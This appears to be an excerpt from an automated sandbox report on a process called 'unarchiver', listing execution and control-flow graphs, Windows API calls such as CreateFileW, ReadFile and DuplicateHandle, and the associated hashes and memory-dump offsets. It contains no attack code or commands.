                                                                                                                                                                                                                                                            execution_graph 1068 e0a120 1069 e0a172 FindNextFileW 1068->1069 1071 e0a1ca 1069->1071 999 e0a962 1002 e0a997 ReadFile 999->1002 1001 e0a9c9 1002->1001 1003 e0abe6 1004 e0ac36 CreatePipe 1003->1004 1005 e0ac3e 1004->1005 1072 e0aba6 1073 e0abe6 CreatePipe 1072->1073 1075 e0ac3e 1073->1075 1076 e0a2ae 1078 e0a2b2 SetErrorMode 1076->1078 1079 e0a31b 1078->1079 1048 e0a370 1049 e0a392 RegQueryValueExW 1048->1049 1051 e0a41b 1049->1051 1017 e0afb2 1018 e0b010 1017->1018 1019 e0afde FindClose 1017->1019 1018->1019 1020 e0aff3 1019->1020 1025 e0a172 1026 e0a1c2 FindNextFileW 1025->1026 1027 e0a1ca 1026->1027 1080 e0a933 1082 e0a962 ReadFile 1080->1082 1083 e0a9c9 1082->1083 1084 e0b1b4 1085 e0b1d6 GetSystemInfo 1084->1085 1087 e0b210 1085->1087 1044 e0a5fe 1045 e0a636 CreateFileW 1044->1045 1047 e0a685 1045->1047 995 e0a882 997 e0a8b7 SetFilePointer 995->997 998 e0a8e6 997->998 1088 e0ad04 1089 e0ad2a DuplicateHandle 1088->1089 1091 e0adaf 1089->1091 1009 e0aa46 1010 e0aa6c CreateDirectoryW 1009->1010 1012 e0aa93 1010->1012 1092 e0af8b 1093 e0afb2 FindClose 1092->1093 1095 e0aff3 1093->1095 1096 e0aa0b 1097 e0aa46 CreateDirectoryW 1096->1097 1099 e0aa93 1097->1099 1100 e0a78f 1101 e0a7c2 GetFileType 1100->1101 1103 e0a824 1101->1103 1104 e0a50f 1105 e0a540 GetTempPathW 1104->1105 1107 e0a5c4 1105->1107 1056 e0a850 1058 e0a882 SetFilePointer 1056->1058 1059 e0a8e6 1058->1059 1060 e0a6d4 1061 e0a716 CloseHandle 1060->1061 1063 e0a750 1061->1063 1028 e0b1d6 1029 e0b202 GetSystemInfo 1028->1029 1030 e0b238 1028->1030 1031 e0b210 1029->1031 1030->1029 1036 e0a716 1037 e0a781 1036->1037 1038 e0a742 CloseHandle 1036->1038 1037->1038 1039 e0a750 1038->1039 1040 e0a2da 1041 e0a306 SetErrorMode 1040->1041 1042 e0a32f 1040->1042 1043 e0a31b 1041->1043 1042->1041 1064 e0a5dc 1066 e0a5fe CreateFileW 1064->1066 1067 e0a685 1066->1067

                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                            Hide Legend
                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                            callgraph 0 Function_00E0AAE0 1 Function_01030000 2 Function_01030807 3 Function_01030606 4 Function_00E0ABE6 5 Function_04CC02C0 5->3 28 Function_04CC0799 5->28 96 Function_010305E1 5->96 6 Function_0103000C 7 Function_00E021F0 8 Function_00E023F4 9 Function_00E0A1F4 10 Function_01030718 11 Function_04CC0DD1 36 Function_04CC0BA0 11->36 12 Function_00E0A5FE 13 Function_00E0A7C2 14 Function_04CC0DE0 14->36 15 Function_0103082E 16 Function_00E020D0 17 Function_00E0A6D4 18 Function_00E0B1D6 19 Function_00E0A2DA 20 Function_00E0AADA 21 Function_00E0A5DC 22 Function_00E0ABA6 23 Function_01030649 34 Function_0103066A 23->34 24 Function_00E0A2AE 25 Function_00E0AEB2 26 Function_00E0AFB2 27 Function_00E0B1B4 28->3 29 Function_04CC0C99 28->29 32 Function_04CC0CA8 28->32 28->36 67 Function_04CC0C50 28->67 71 Function_04CC0C60 28->71 28->96 30 Function_00E023BC 31 Function_00E0A882 33 Function_00E0A486 35 Function_00E0AF8B 37 Function_04CC0DA2 37->36 38 Function_0103026D 39 Function_00E0AC8E 40 Function_00E0A78F 41 Function_00E0A392 42 Function_00E02194 43 Function_00E02098 44 Function_00E0A09A 45 Function_0103067F 46 Function_04CC05B1 47 Function_00E0B49E 48 Function_00E0B39E 49 Function_00E0A462 50 Function_00E0A962 51 Function_01030880 52 Function_04CC0748 53 Function_00E02364 54 Function_00E02264 55 Function_00E0A566 56 Function_01030784 57 Function_00E0AC6C 58 Function_00E0AE6E 59 Function_00E0A370 60 Function_00E0B470 61 Function_00E0A172 62 Function_00E0B276 63 Function_00E0AB76 64 Function_00E0A078 65 Function_00E0AE78 66 Function_00E0257B 68 Function_00E0AE7F 69 Function_00E0AA46 70 Function_00E0B246 72 Function_00E0A850 73 Function_010307B2 74 Function_00E0B351 75 Function_00E0B052 76 Function_010307B6 77 Function_00E02458 78 Function_00E0A45C 79 Function_00E0B15D 80 Function_00E0A120 81 Function_00E0B121 82 Function_010305C1 83 Function_00E0AF22 84 Function_04CC0E08 84->36 85 Function_00E0AD2A 86 Function_04CC0007 87 Function_00E0A02E 88 Function_00E02430 89 Function_010305D1 90 Function_00E0A933 91 Function_04CC0E18 91->36 92 Function_00E0A23A 93 Function_00E0213C 94 Function_00E0A33D 95 Function_00E0AF00 97 Function_00E0AD04 98 Function_00E02005 99 Function_00E0A005 100 Function_00E0AE05 101 Function_00E0AB06 102 Function_00E0AA0B 103 Function_00E0A50F 104 Function_04CC0C3D 105 Function_00E0A716 106 Function_00E0B01E

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00E0B208
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                                                            • Opcode ID: a06d5c4a21f2814a883b501c1995268d9e2c56cd7a0f8a5855567938e2e6aa29
                                                                                                                                                                                                                                                            • Instruction ID: 4b7f34f1ce490cd8ea66d1fa492528d4b66f52161a6e53b7d2d4f120ebf831a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a06d5c4a21f2814a883b501c1995268d9e2c56cd7a0f8a5855567938e2e6aa29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C901D1709002449FDB10CF55E9897A9FBE4EF04724F08C4AADD499F2A6D379A584CFA2

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 4cc0c99-4cc0ce1 6 4cc0d0e-4cc0d16 0->6 7 4cc0ce3-4cc0d0c 0->7 10 4cc0d1e-4cc0d92 6->10 7->10 21 4cc0d99-4cc0dcb 10->21
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: PGj$`Ej$`Ej$e]>j^
                                                                                                                                                                                                                                                            • API String ID: 0-1012526286
                                                                                                                                                                                                                                                            • Opcode ID: 3b636ef71e2dfea77ac6b3b0e859b9f66f3dc2e7efd9570295e5d2684e94b736
                                                                                                                                                                                                                                                            • Instruction ID: e3269467aadb331a3191feb94cb077b2e76545a9f421f81d51278ef7dfc0a121
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b636ef71e2dfea77ac6b3b0e859b9f66f3dc2e7efd9570295e5d2684e94b736
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2213570B042458BCB15EA7A88447AEBFD79FC9614B44883CE186DB782DF35ED028792

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 24 4cc0ca8-4cc0ce1 27 4cc0d0e-4cc0d16 24->27 28 4cc0ce3-4cc0d0c 24->28 31 4cc0d1e-4cc0d92 27->31 28->31 42 4cc0d99-4cc0dcb 31->42
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: PGj$`Ej$`Ej$e]>j^
                                                                                                                                                                                                                                                            • API String ID: 0-1012526286
                                                                                                                                                                                                                                                            • Opcode ID: a82c337da5b68ae1bd4c97c977564f10524ba5ff2fd9faaa078b2be8dd5a1e0f
                                                                                                                                                                                                                                                            • Instruction ID: 696d41ad89a261696c904e3972a31cef25f2db45b1f15fc2fe54febefb05c74d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a82c337da5b68ae1bd4c97c977564f10524ba5ff2fd9faaa078b2be8dd5a1e0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E210570B002148BCB14EB7A888466EBBD7AFC9614B44C83CD186DB782DF75ED028791

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 45 4cc0799-4cc07c7 48 4cc07cd-4cc07da 45->48 49 4cc0b77 45->49 146 4cc07dc call 10305e1 48->146 147 4cc07dc call 1030606 48->147 148 4cc07dc call 4cc0ba0 48->148 51 4cc0b83-4cc0b8d 49->51 52 4cc07e2 149 4cc07e2 call 4cc0c50 52->149 150 4cc07e2 call 4cc0c60 52->150 53 4cc07e8-4cc0802 call 4cc0ba0 56 4cc0804-4cc080e 53->56 57 4cc0810 53->57 58 4cc0815-4cc0817 56->58 57->58 59 4cc081d-4cc088e 58->59 60 4cc089b-4cc0940 58->60 137 4cc0890 call 10305e1 59->137 138 4cc0890 call 4cc0ca8 59->138 139 4cc0890 call 1030606 59->139 140 4cc0890 call 4cc0c99 59->140 77 4cc0948-4cc09a9 call 4cc0ba0 * 2 60->77 76 4cc0896 76->77 87 4cc09af 77->87 88 4cc0b63-4cc0b67 77->88 90 4cc09b2-4cc09da 87->90 88->51 89 4cc0b69-4cc0b75 88->89 89->51 95 4cc09e0-4cc09e4 90->95 96 4cc0b51-4cc0b5d 90->96 97 4cc0b39-4cc0b46 95->97 98 4cc09ea-4cc09fd 95->98 96->88 96->90 102 4cc0b4e 97->102 99 4cc09ff 98->99 100 4cc0a70-4cc0a74 98->100 101 4cc0a02-4cc0a24 99->101 100->102 103 4cc0a7a-4cc0aa7 call 4cc0ba0 100->103 109 4cc0a2b-4cc0a5e 101->109 110 4cc0a26 101->110 102->96 115 4cc0aae-4cc0ad5 103->115 116 4cc0aa9 103->116 121 4cc0a67-4cc0a6e 109->121 122 4cc0a60 109->122 110->109 124 4cc0b1d-4cc0b25 115->124 125 4cc0ad7-4cc0aed 115->125 116->115 121->100 121->101 122->121 124->102 129 4cc0aef 125->129 130 4cc0af4-4cc0b1b 125->130 129->130 130->124 134 4cc0b27-4cc0b2f 130->134 141 4cc0b31 call 4cc0ca8 134->141 142 4cc0b31 call 4cc0c99 134->142 135 4cc0b37 135->102 137->76 138->76 139->76 140->76 141->135 142->135 146->52 147->52 148->52 149->53 150->53
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: :@fj$:@fj
                                                                                                                                                                                                                                                            • API String ID: 0-1880068426
                                                                                                                                                                                                                                                            • Opcode ID: cd152bcaad83db67d9f51d837bde215340da67eb21d7ec1fdc3115d311b11fec
                                                                                                                                                                                                                                                            • Instruction ID: 0a1d5e6221638d08fcad4c0afcaf9366925c76a23c5b2ffe9d60342519bf61fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd152bcaad83db67d9f51d837bde215340da67eb21d7ec1fdc3115d311b11fec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4A19E30B012058FDB14EBB9D89976EB7E3EF88308F148429E90697395DF789D52CB91

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 151 e0b246-e0b2eb 156 e0b343-e0b348 151->156 157 e0b2ed-e0b2f5 DuplicateHandle 151->157 156->157 159 e0b2fb-e0b30d 157->159 160 e0b34a-e0b34f 159->160 161 e0b30f-e0b340 159->161 160->161
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0B2F3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 8c2afe1e09c10985433f053b15b9aed9434cd8fa13ad44cc3efbc6ac06889bc0
                                                                                                                                                                                                                                                            • Instruction ID: b664807efb486bec854f0fd3ed43d1b100568870f36029bd982c9fda42ae72f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c2afe1e09c10985433f053b15b9aed9434cd8fa13ad44cc3efbc6ac06889bc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D03174715043446FE7228B61DC45FA6BFFCEF45314F0444AAE985DB162D378A909CB71

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 165 e0ad04-e0ad9f 170 e0ada1-e0ada9 DuplicateHandle 165->170 171 e0adf7-e0adfc 165->171 173 e0adaf-e0adc1 170->173 171->170 174 e0adc3-e0adf4 173->174 175 e0adfe-e0ae03 173->175 175->174
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0ADA7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 238772080e65a8d6b25e3cb00be0c8c607c4a7fb36f63abc04927e38fe301f9c
                                                                                                                                                                                                                                                            • Instruction ID: 360d1a87085d4f7015cdcf51ce22d0c810dbadf1970825c66babeac62c4b7bf4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 238772080e65a8d6b25e3cb00be0c8c607c4a7fb36f63abc04927e38fe301f9c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D31B5715043446FEB228B61CC45F67BFECEF05214F0848AAF985DB562D324A909CB71

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 179 e0a5dc-e0a656 183 e0a658 179->183 184 e0a65b-e0a667 179->184 183->184 185 e0a669 184->185 186 e0a66c-e0a675 184->186 185->186 187 e0a6c6-e0a6cb 186->187 188 e0a677-e0a69b CreateFileW 186->188 187->188 191 e0a6cd-e0a6d2 188->191 192 e0a69d-e0a6c3 188->192 191->192
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E0A67D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: d4bae6c5e420553d3443aea4afeb8cf25198d8f5a66af76992f4566e8513a7e3
                                                                                                                                                                                                                                                            • Instruction ID: 93b6c0f70338c72ab91ff7cefeef3996980bbf09ce322610b37e4e8c33bc2487
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4bae6c5e420553d3443aea4afeb8cf25198d8f5a66af76992f4566e8513a7e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9319071504344AFE721CB65DC84F62BBF8EF05214F0884AEE9859B252D375E808CB71

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 195 e0a120-e0a1f3 FindNextFileW
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00E0A1C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 487b347d7bc0cce616a19ca2532cff14fbd769cd8bdd5c6f1a297aef4e06b18a
                                                                                                                                                                                                                                                            • Instruction ID: 7bd669865af550be6ff52fa4800ca562485711cd23101e252247bffc1f5a1299
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 487b347d7bc0cce616a19ca2532cff14fbd769cd8bdd5c6f1a297aef4e06b18a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921A17150D3C46FD3128B258C91BA6BFB4EF47610F0985DBD8848F693D229A919CBA2

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 200 e0a370-e0a3cf 203 e0a3d1 200->203 204 e0a3d4-e0a3dd 200->204 203->204 205 e0a3e2-e0a3e8 204->205 206 e0a3df 204->206 207 e0a3ea 205->207 208 e0a3ed-e0a404 205->208 206->205 207->208 210 e0a406-e0a419 RegQueryValueExW 208->210 211 e0a43b-e0a440 208->211 212 e0a442-e0a447 210->212 213 e0a41b-e0a438 210->213 211->210 212->213
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A40C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3660427363-0
                                                                                                                                                                                                                                                            • Opcode ID: d30ecafa5b9a0e6e69dad44267ef4f2ed97e0c0d4b40477756d969f65c8a85f6
                                                                                                                                                                                                                                                            • Instruction ID: 51e4808e2a77da9d6401739a7897ea791aacf03f684cde5c98b810b6febeb2b5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d30ecafa5b9a0e6e69dad44267ef4f2ed97e0c0d4b40477756d969f65c8a85f6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B217C75504344AFD721CB11CC84FA6BBE8EF05714F0884AAE9859B292D368E948CB62

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 235 e0b276-e0b2eb 239 e0b343-e0b348 235->239 240 e0b2ed-e0b2f5 DuplicateHandle 235->240 239->240 242 e0b2fb-e0b30d 240->242 243 e0b34a-e0b34f 242->243 244 e0b30f-e0b340 242->244 243->244
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0B2F3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 3e8ab6ef57d88c62db527d69bf770a7cd2db7073eab6945618ab5e751d9834e6
                                                                                                                                                                                                                                                            • Instruction ID: e6f147848238de1666c7e46d18a166b37e91a4b73b2352065d159a1aea44f49e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e8ab6ef57d88c62db527d69bf770a7cd2db7073eab6945618ab5e751d9834e6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6221B271500208AFEB219F61CC85FAAFBECEF04314F04886AE945DB251D778A5448B71

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 222 e0ad2a-e0ad9f 226 e0ada1-e0ada9 DuplicateHandle 222->226 227 e0adf7-e0adfc 222->227 229 e0adaf-e0adc1 226->229 227->226 230 e0adc3-e0adf4 229->230 231 e0adfe-e0ae03 229->231 231->230
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0ADA7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 667a50f46ba1ff0696da9ff258e1986320a9e4b86a3d0e5951a8d188759d0cf9
                                                                                                                                                                                                                                                            • Instruction ID: d8347a10c9b6911fa0e5a97800ff5a045f621973ea5b2ba3aebe3d61a186294a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 667a50f46ba1ff0696da9ff258e1986320a9e4b86a3d0e5951a8d188759d0cf9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51219271500308AFEB219F65DC85FABFBECEF04328F04886AF9459A551D774A5448B71

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 217 e0a50f-e0a563 219 e0a566-e0a5be GetTempPathW 217->219 221 e0a5c4-e0a5da 219->221
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00E0A5B6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PathTemp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                                                                                                                                            • Opcode ID: 339d18865bedda47c42b5149cb1a4113dcc9b8a2b5b68c200a8def2ba39afb64
                                                                                                                                                                                                                                                            • Instruction ID: 5708bf98553d514399b51096d35ef879a5c8ca471d711e861b2c4d5c28ec0cd4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 339d18865bedda47c42b5149cb1a4113dcc9b8a2b5b68c200a8def2ba39afb64
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F42181B150D3C06FD7138B25CC51B62BFB8EF87614F0A81DBE8849B593D624A919C7B2

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 248 e0a850-e0a8d6 252 e0a8d8-e0a8f8 SetFilePointer 248->252 253 e0a91a-e0a91f 248->253 256 e0a921-e0a926 252->256 257 e0a8fa-e0a917 252->257 253->252 256->257
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A8DE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                            • Opcode ID: 7f1fc8804682311e7e751f0e094521ddaf74a53db229616a0d056b3ee0aa0052
                                                                                                                                                                                                                                                            • Instruction ID: 7040e363fafd967d9639ea678da5d2daedaaa6d48798a103d80361993c0f339e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f1fc8804682311e7e751f0e094521ddaf74a53db229616a0d056b3ee0aa0052
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2521A4715093846FE7228B60DC84F66BFB8EF46714F0984EAE9849F153C264A909C775

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 260 e0a933-e0a9b9 264 e0a9bb-e0a9db ReadFile 260->264 265 e0a9fd-e0aa02 260->265 268 e0aa04-e0aa09 264->268 269 e0a9dd-e0a9fa 264->269 265->264 268->269
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A9C1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
